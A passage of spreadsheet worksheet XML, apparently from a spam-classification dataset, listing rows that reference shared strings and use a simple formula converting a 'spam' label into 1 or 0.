    <row r="2699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2699" t="s">
        <v>7874</v>
      </c>
      <c r="B2699" t="s">
        <v>5294</v>
      </c>
      <c r="C2699" s="1">
        <f>IF(B2699="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2700" t="s">
        <v>7875</v>
      </c>
      <c r="B2700" t="s">
        <v>5297</v>
      </c>
      <c r="C2700" s="1">
        <f>IF(B2700="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2701" t="s">
        <v>7876</v>
      </c>
      <c r="B2701" t="s">
        <v>5294</v>
      </c>
      <c r="C2701" s="1">
        <f>IF(B2701="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2702" t="s">
        <v>7877</v>
      </c>
      <c r="B2702" t="s">
        <v>5294</v>
      </c>
      <c r="C2702" s="1">
        <f>IF(B2702="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2703" t="s">
        <v>7878</v>
      </c>
      <c r="B2703" t="s">
        <v>5294</v>
      </c>
      <c r="C2703" s="1">
        <f>IF(B2703="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2704" t="s">
        <v>7879</v>
      </c>
      <c r="B2704" t="s">
        <v>5294</v>
      </c>
      <c r="C2704" s="1">
        <f>IF(B2704="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2705" t="s">
        <v>7880</v>
      </c>
      <c r="B2705" t="s">
        <v>5294</v>
      </c>
      <c r="C2705" s="1">
        <f>IF(B2705="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2706" t="s">
        <v>7881</v>
      </c>
      <c r="B2706" t="s">
        <v>5297</v>
      </c>
      <c r="C2706" s="1">
        <f>IF(B2706="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2707" t="s">
        <v>7882</v>
      </c>
      <c r="B2707" t="s">
        <v>5294</v>
      </c>
      <c r="C2707" s="1">
        <f>IF(B2707="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2708" t="s">
        <v>7883</v>
      </c>
      <c r="B2708" t="s">
        <v>5294</v>
      </c>
      <c r="C2708" s="1">
        <f>IF(B2708="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2709" t="s">
        <v>7884</v>
      </c>
      <c r="B2709" t="s">
        <v>5297</v>
      </c>
      <c r="C2709" s="1">
        <f>IF(B2709="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2710" t="s">
        <v>7885</v>
      </c>
      <c r="B2710" t="s">
        <v>5294</v>
      </c>
      <c r="C2710" s="1">
        <f>IF(B2710="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2711" t="s">
        <v>7886</v>
      </c>
      <c r="B2711" t="s">
        <v>5294</v>
      </c>
      <c r="C2711" s="1">
        <f>IF(B2711="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2712" t="s">
        <v>7887</v>
      </c>
      <c r="B2712" t="s">
        <v>5297</v>
      </c>
      <c r="C2712" s="1">
        <f>IF(B2712="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2713" t="s">
        <v>5543</v>
      </c>
      <c r="B2713" t="s">
        <v>5294</v>
      </c>
      <c r="C2713" s="1">
        <f>IF(B2713="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2714" t="s">
        <v>7888</v>
      </c>
      <c r="B2714" t="s">
        <v>5294</v>
      </c>
      <c r="C2714" s="1">
        <f>IF(B2714="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2715" t="s">
        <v>7889</v>
      </c>
      <c r="B2715" t="s">
        <v>5294</v>
      </c>
      <c r="C2715" s="1">
        <f>IF(B2715="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2716" t="s">
        <v>7890</v>
      </c>
      <c r="B2716" t="s">
        <v>5294</v>
      </c>
      <c r="C2716" s="1">
        <f>IF(B2716="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2717" t="s">
        <v>7891</v>
      </c>
      <c r="B2717" t="s">
        <v>5294</v>
      </c>
      <c r="C2717" s="1">
        <f>IF(B2717="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2718" t="s">
        <v>7892</v>
      </c>
      <c r="B2718" t="s">
        <v>5294</v>
      </c>
      <c r="C2718" s="1">
        <f>IF(B2718="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2719" t="s">
        <v>7893</v>
      </c>
      <c r="B2719" t="s">
        <v>5294</v>
      </c>
      <c r="C2719" s="1">
        <f>IF(B2719="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2720" t="s">
        <v>6320</v>
      </c>
      <c r="B2720" t="s">
        <v>5297</v>
      </c>
      <c r="C2720" s="1">
        <f>IF(B2720="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2721" t="s">
        <v>7894</v>
      </c>
      <c r="B2721" t="s">
        <v>5294</v>
      </c>
      <c r="C2721" s="1">
        <f>IF(B2721="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2722" t="s">
        <v>7804</v>
      </c>
      <c r="B2722" t="s">
        <v>5294</v>
      </c>
      <c r="C2722" s="1">
        <f>IF(B2722="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2723" t="s">
        <v>7895</v>
      </c>
      <c r="B2723" t="s">
        <v>5294</v>
      </c>
      <c r="C2723" s="1">
        <f>IF(B2723="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2724" t="s">
        <v>7896</v>
      </c>
      <c r="B2724" t="s">
        <v>5294</v>
      </c>
      <c r="C2724" s="1">
        <f>IF(B2724="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2725" t="s">
        <v>7897</v>
      </c>
      <c r="B2725" t="s">
        <v>5294</v>
      </c>
      <c r="C2725" s="1">
        <f>IF(B2725="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2726" t="s">
        <v>7898</v>
      </c>
      <c r="B2726" t="s">
        <v>5294</v>
      </c>
      <c r="C2726" s="1">
        <f>IF(B2726="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2727" t="s">
        <v>7899</v>
      </c>
      <c r="B2727" t="s">
        <v>5294</v>
      </c>
      <c r="C2727" s="1">
        <f>IF(B2727="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2728" t="s">
        <v>7900</v>
      </c>
      <c r="B2728" t="s">
        <v>5294</v>
      </c>
      <c r="C2728" s="1">
        <f>IF(B2728="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2729" t="s">
        <v>5704</v>
      </c>
      <c r="B2729" t="s">
        <v>5294</v>
      </c>
      <c r="C2729" s="1">
        <f>IF(B2729="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2730" t="s">
        <v>7901</v>
      </c>
      <c r="B2730" t="s">
        <v>5297</v>
      </c>
      <c r="C2730" s="1">
        <f>IF(B2730="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2731" t="s">
        <v>7902</v>
      </c>
      <c r="B2731" t="s">
        <v>5297</v>
      </c>
      <c r="C2731" s="1">
        <f>IF(B2731="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2732" t="s">
        <v>7903</v>
      </c>
      <c r="B2732" t="s">
        <v>5294</v>
      </c>
      <c r="C2732" s="1">
        <f>IF(B2732="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2733" t="s">
        <v>7904</v>
      </c>
      <c r="B2733" t="s">
        <v>5294</v>
      </c>
      <c r="C2733" s="1">
        <f>IF(B2733="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2734" t="s">
        <v>7905</v>
      </c>
      <c r="B2734" t="s">
        <v>5294</v>
      </c>
      <c r="C2734" s="1">
        <f>IF(B2734="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2735" t="s">
        <v>7906</v>
      </c>
      <c r="B2735" t="s">
        <v>5294</v>
      </c>
      <c r="C2735" s="1">
        <f>IF(B2735="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2736" t="s">
        <v>7907</v>
      </c>
      <c r="B2736" t="s">
        <v>5294</v>
      </c>
      <c r="C2736" s="1">
        <f>IF(B2736="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2737" t="s">
        <v>7908</v>
      </c>
      <c r="B2737" t="s">
        <v>5294</v>
      </c>
      <c r="C2737" s="1">
        <f>IF(B2737="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2738" t="s">
        <v>7909</v>
      </c>
      <c r="B2738" t="s">
        <v>5294</v>
      </c>
      <c r="C2738" s="1">
        <f>IF(B2738="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2739" t="s">
        <v>7910</v>
      </c>
      <c r="B2739" t="s">
        <v>5294</v>
      </c>
      <c r="C2739" s="1">
        <f>IF(B2739="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2740" t="s">
        <v>7911</v>
      </c>
      <c r="B2740" t="s">
        <v>5294</v>
      </c>
      <c r="C2740" s="1">
        <f>IF(B2740="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2741" t="s">
        <v>5585</v>
      </c>
      <c r="B2741" t="s">
        <v>5294</v>
      </c>
      <c r="C2741" s="1">
        <f>IF(B2741="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2742" t="s">
        <v>7912</v>
      </c>
      <c r="B2742" t="s">
        <v>5294</v>
      </c>
      <c r="C2742" s="1">
        <f>IF(B2742="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2743" t="s">
        <v>6408</v>
      </c>
      <c r="B2743" t="s">
        <v>5297</v>
      </c>
      <c r="C2743" s="1">
        <f>IF(B2743="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2744" t="s">
        <v>7913</v>
      </c>
      <c r="B2744" t="s">
        <v>5294</v>
      </c>
      <c r="C2744" s="1">
        <f>IF(B2744="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2745" t="s">
        <v>7914</v>
      </c>
      <c r="B2745" t="s">
        <v>5294</v>
      </c>
      <c r="C2745" s="1">
        <f>IF(B2745="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2746" t="s">
        <v>7915</v>
      </c>
      <c r="B2746" t="s">
        <v>5294</v>
      </c>
      <c r="C2746" s="1">
        <f>IF(B2746="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2747" t="s">
        <v>7916</v>
      </c>
      <c r="B2747" t="s">
        <v>5294</v>
      </c>
      <c r="C2747" s="1">
        <f>IF(B2747="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2748" t="s">
        <v>7917</v>
      </c>
      <c r="B2748" t="s">
        <v>5294</v>
      </c>
      <c r="C2748" s="1">
        <f>IF(B2748="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2749" t="s">
        <v>7918</v>
      </c>
      <c r="B2749" t="s">
        <v>5294</v>
      </c>
      <c r="C2749" s="1">
        <f>IF(B2749="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2750" t="s">
        <v>7919</v>
      </c>
      <c r="B2750" t="s">
        <v>5294</v>
      </c>
      <c r="C2750" s="1">
        <f>IF(B2750="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2751" t="s">
        <v>7920</v>
      </c>
      <c r="B2751" t="s">
        <v>5294</v>
      </c>
      <c r="C2751" s="1">
        <f>IF(B2751="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2752" t="s">
        <v>7921</v>
      </c>
      <c r="B2752" t="s">
        <v>5294</v>
      </c>
      <c r="C2752" s="1">
        <f>IF(B2752="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2753" t="s">
        <v>7922</v>
      </c>
      <c r="B2753" t="s">
        <v>5294</v>
      </c>
      <c r="C2753" s="1">
        <f>IF(B2753="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2754" t="s">
        <v>7923</v>
      </c>
      <c r="B2754" t="s">
        <v>5294</v>
      </c>
      <c r="C2754" s="1">
        <f>IF(B2754="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2755" t="s">
        <v>7924</v>
      </c>
      <c r="B2755" t="s">
        <v>5294</v>
      </c>
      <c r="C2755" s="1">
        <f>IF(B2755="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2756" t="s">
        <v>7925</v>
      </c>
      <c r="B2756" t="s">
        <v>5294</v>
      </c>
      <c r="C2756" s="1">
        <f>IF(B2756="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2757" t="s">
        <v>7926</v>
      </c>
      <c r="B2757" t="s">
        <v>5294</v>
      </c>
      <c r="C2757" s="1">
        <f>IF(B2757="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2758" t="s">
        <v>7927</v>
      </c>
      <c r="B2758" t="s">
        <v>5294</v>
      </c>
      <c r="C2758" s="1">
        <f>IF(B2758="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2759" t="s">
        <v>7928</v>
      </c>
      <c r="B2759" t="s">
        <v>5294</v>
      </c>
      <c r="C2759" s="1">
        <f>IF(B2759="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2760" t="s">
        <v>7929</v>
      </c>
      <c r="B2760" t="s">
        <v>5294</v>
      </c>
      <c r="C2760" s="1">
        <f>IF(B2760="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2761" t="s">
        <v>7930</v>
      </c>
      <c r="B2761" t="s">
        <v>5294</v>
      </c>
      <c r="C2761" s="1">
        <f>IF(B2761="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2762" t="s">
        <v>7679</v>
      </c>
      <c r="B2762" t="s">
        <v>5294</v>
      </c>
      <c r="C2762" s="1">
        <f>IF(B2762="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2763" t="s">
        <v>6240</v>
      </c>
      <c r="B2763" t="s">
        <v>5294</v>
      </c>
      <c r="C2763" s="1">
        <f>IF(B2763="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2764" t="s">
        <v>7931</v>
      </c>
      <c r="B2764" t="s">
        <v>5294</v>
      </c>
      <c r="C2764" s="1">
        <f>IF(B2764="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2765" t="s">
        <v>7090</v>
      </c>
      <c r="B2765" t="s">
        <v>5294</v>
      </c>
      <c r="C2765" s="1">
        <f>IF(B2765="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2766" t="s">
        <v>7932</v>
      </c>
      <c r="B2766" t="s">
        <v>5294</v>
      </c>
      <c r="C2766" s="1">
        <f>IF(B2766="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2767" t="s">
        <v>7933</v>
      </c>
      <c r="B2767" t="s">
        <v>5294</v>
      </c>
      <c r="C2767" s="1">
        <f>IF(B2767="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2768" t="s">
        <v>7934</v>
      </c>
      <c r="B2768" t="s">
        <v>5297</v>
      </c>
      <c r="C2768" s="1">
        <f>IF(B2768="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2769" t="s">
        <v>7935</v>
      </c>
      <c r="B2769" t="s">
        <v>5294</v>
      </c>
      <c r="C2769" s="1">
        <f>IF(B2769="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2770" t="s">
        <v>7936</v>
      </c>
      <c r="B2770" t="s">
        <v>5294</v>
      </c>
      <c r="C2770" s="1">
        <f>IF(B2770="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2771" t="s">
        <v>7937</v>
      </c>
      <c r="B2771" t="s">
        <v>5297</v>
      </c>
      <c r="C2771" s="1">
        <f>IF(B2771="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2772" t="s">
        <v>7938</v>
      </c>
      <c r="B2772" t="s">
        <v>5294</v>
      </c>
      <c r="C2772" s="1">
        <f>IF(B2772="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2773" t="s">
        <v>7939</v>
      </c>
      <c r="B2773" t="s">
        <v>5294</v>
      </c>
      <c r="C2773" s="1">
        <f>IF(B2773="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2774" t="s">
        <v>7940</v>
      </c>
      <c r="B2774" t="s">
        <v>5294</v>
      </c>
      <c r="C2774" s="1">
        <f>IF(B2774="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2775" t="s">
        <v>7941</v>
      </c>
      <c r="B2775" t="s">
        <v>5297</v>
      </c>
      <c r="C2775" s="1">
        <f>IF(B2775="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2776" t="s">
        <v>7942</v>
      </c>
      <c r="B2776" t="s">
        <v>5294</v>
      </c>
      <c r="C2776" s="1">
        <f>IF(B2776="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2777" t="s">
        <v>7943</v>
      </c>
      <c r="B2777" t="s">
        <v>5294</v>
      </c>
      <c r="C2777" s="1">
        <f>IF(B2777="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2778" t="s">
        <v>7944</v>
      </c>
      <c r="B2778" t="s">
        <v>5294</v>
      </c>
      <c r="C2778" s="1">
        <f>IF(B2778="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2779" t="s">
        <v>7945</v>
      </c>
      <c r="B2779" t="s">
        <v>5294</v>
      </c>
      <c r="C2779" s="1">
        <f>IF(B2779="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2780" t="s">
        <v>7946</v>
      </c>
      <c r="B2780" t="s">
        <v>5297</v>
      </c>
      <c r="C2780" s="1">
        <f>IF(B2780="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2781" t="s">
        <v>7947</v>
      </c>
      <c r="B2781" t="s">
        <v>5294</v>
      </c>
      <c r="C2781" s="1">
        <f>IF(B2781="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2782" t="s">
        <v>7948</v>
      </c>
      <c r="B2782" t="s">
        <v>5294</v>
      </c>
      <c r="C2782" s="1">
        <f>IF(B2782="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2783" t="s">
        <v>7949</v>
      </c>
      <c r="B2783" t="s">
        <v>5294</v>
      </c>
      <c r="C2783" s="1">
        <f>IF(B2783="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2784" t="s">
        <v>7950</v>
      </c>
      <c r="B2784" t="s">
        <v>5294</v>
      </c>
      <c r="C2784" s="1">
        <f>IF(B2784="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2785" t="s">
        <v>7951</v>
      </c>
      <c r="B2785" t="s">
        <v>5294</v>
      </c>
      <c r="C2785" s="1">
        <f>IF(B2785="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2786" t="s">
        <v>7952</v>
      </c>
      <c r="B2786" t="s">
        <v>5294</v>
      </c>
      <c r="C2786" s="1">
        <f>IF(B2786="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2787" t="s">
        <v>7953</v>
      </c>
      <c r="B2787" t="s">
        <v>5294</v>
      </c>
      <c r="C2787" s="1">
        <f>IF(B2787="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2788" t="s">
        <v>7954</v>
      </c>
      <c r="B2788" t="s">
        <v>5294</v>
      </c>
      <c r="C2788" s="1">
        <f>IF(B2788="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2789" t="s">
        <v>7955</v>
      </c>
      <c r="B2789" t="s">
        <v>5294</v>
      </c>
      <c r="C2789" s="1">
        <f>IF(B2789="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2790" t="s">
        <v>7956</v>
      </c>
      <c r="B2790" t="s">
        <v>5294</v>
      </c>
      <c r="C2790" s="1">
        <f>IF(B2790="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2791" t="s">
        <v>7957</v>
      </c>
      <c r="B2791" t="s">
        <v>5294</v>
      </c>
      <c r="C2791" s="1">
        <f>IF(B2791="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2792" t="s">
        <v>7958</v>
      </c>
      <c r="B2792" t="s">
        <v>5297</v>
      </c>
      <c r="C2792" s="1">
        <f>IF(B2792="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2793" t="s">
        <v>7959</v>
      </c>
      <c r="B2793" t="s">
        <v>5294</v>
      </c>
      <c r="C2793" s="1">
        <f>IF(B2793="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2794" t="s">
        <v>7960</v>
      </c>
      <c r="B2794" t="s">
        <v>5294</v>
      </c>
      <c r="C2794" s="1">
        <f>IF(B2794="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2795" t="s">
        <v>7961</v>
      </c>
      <c r="B2795" t="s">
        <v>5294</v>
      </c>
      <c r="C2795" s="1">
        <f>IF(B2795="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2796" t="s">
        <v>7962</v>
      </c>
      <c r="B2796" t="s">
        <v>5294</v>
      </c>
      <c r="C2796" s="1">
        <f>IF(B2796="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2797" t="s">
        <v>7539</v>
      </c>
      <c r="B2797" t="s">
        <v>5294</v>
      </c>
      <c r="C2797" s="1">
        <f>IF(B2797="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2798" t="s">
        <v>7963</v>
      </c>
      <c r="B2798" t="s">
        <v>5294</v>
      </c>
      <c r="C2798" s="1">
        <f>IF(B2798="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2799" t="s">
        <v>6732</v>
      </c>
      <c r="B2799" t="s">
        <v>5294</v>
      </c>
      <c r="C2799" s="1">
        <f>IF(B2799="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2800" t="s">
        <v>7964</v>
      </c>
      <c r="B2800" t="s">
        <v>5294</v>
      </c>
      <c r="C2800" s="1">
        <f>IF(B2800="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2801" t="s">
        <v>7965</v>
      </c>
      <c r="B2801" t="s">
        <v>5294</v>
      </c>
      <c r="C2801" s="1">
        <f>IF(B2801="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2802" t="s">
        <v>7966</v>
      </c>
      <c r="B2802" t="s">
        <v>5294</v>
      </c>
      <c r="C2802" s="1">
        <f>IF(B2802="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
